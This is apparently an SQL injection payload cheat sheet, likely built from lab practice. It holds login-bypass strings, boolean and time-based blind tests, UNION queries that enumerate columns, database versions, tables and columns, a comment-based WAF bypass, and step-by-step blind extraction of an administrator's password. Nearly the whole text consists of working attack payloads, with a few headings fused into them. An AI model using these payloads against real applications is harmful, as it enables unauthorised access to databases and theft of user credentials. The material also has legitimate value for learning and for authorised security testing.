//mysql
'
"
' or 1=1-- -
" or 1=1;-- -
' or '1'='1 -- -
or 1=1 --
// Blind
IF TRUE -- Welcome Message Appears
IF False -- No welcome Message
### Sample case
xyz' AND '1'='1
xyz' AND '1'='3
// Time Based
; IF (1=1) WAITFOR DELAY '0:0:10'--
' SELECT SLEEP(10)
x'||pg_sleep(10)--Last updated
# Identify the number of columns
' order by 1-- -
' order by 1,2,3-- -
' order by 3-- -
## Identify string values
' union select 1,2,3,4 --
' union select null,null,'value',4 --
### Identify Database version
' union select null,null,@@version,4 -- >> MYSQL
' union select null,null,v$version,4 -- >> Oracle
' union select null,null,version(),4 -- >> PostgreSQL
### Finding table
' union select null,null,table_name,4 from information_schema.tables --
### Finding column
' union select null,null,column_name,4 from information_schema.columns where table_name='tablename' --
#### Query where only 1 strings avaiable
' union select null,null,user ||::|| password from users--
### Bypass Common WAF (space)
/**/
' un/**/ion sel/**/ect 1,2,3,4 --## Oracle
'+UNION+SELECT+'abc','def'+FROM+dual--
'+UNION+SELECT+table_name,NULL+FROM+all_tables--
'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_WWRLUL'--
'+UNION+SELECT+USERNAME_APKVBL,+PASSWORD_HIGTTZ+FROM+USERS_WWRLUL--## Find the length of password
' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
## Assuming it has a username and password column
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm
-- Return welcome message, this indicate the value at position 1 is > M (M,N,O,P,Q,R)
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'r
-- no welcome message, indicate the value is not greater than R
## Extract data
xyz' AND (SELECT SUBSTRING(password,$i,1) FROM users WHERE username='administrator')='$v
-- i == position to test
-- v == value